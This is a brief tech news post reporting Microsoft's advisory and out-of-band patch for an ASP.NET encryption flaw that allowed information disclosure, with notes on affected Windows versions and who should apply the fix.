On September 17th Microsoft put out an advisory for ASP.NET warning that it could be exploited to allow information disclosure. ASP.NET is a development framework used to create websites and applications, the flaw is a vulnerability in its encryption scheme. The flaw got an Important rating from Microsoft because if ASP.NET sites used cryptography in certain ways sensitive information could be gained by unauthorized parties. In reality nearly all ASP.NET sites suffer from the problem as a range of commonly-used built-in features utilize the affected code.
This vulnerability is being actively hacked, PC World reports the extent of possible damage:
The fix addresses a vulnerability in ASP.Net’s encryption that attackers could abuse to access Web applications with full administrator rights; decrypt session cookies or other encrypted data on a remote server; and access and snatch files from sites or Web applications.
Since news of the exploit came out web admins have been running workarounds to avoid the problem. Now according to PC World an out-of-band patch went up yesterday to fix this compromising bug. This problem doesn’t affect everybody, the people that will be most interested in getting this fix are those that run web servers – web admins, large enterprises, and hosting providers. The patch is not on Windows Update yet so it must be manually downloaded. The reason for this is because those that are most concerned with fixing the bug will not often use Windows Update and instead have their own patch testing methodology.
The bulletin for the patch can be seen here. The patch is for all Windows versions from XP SP3 and Server 2003 to Win 7 and Server 2008 R2. The next scheduled Patch Tuesday will be October 12.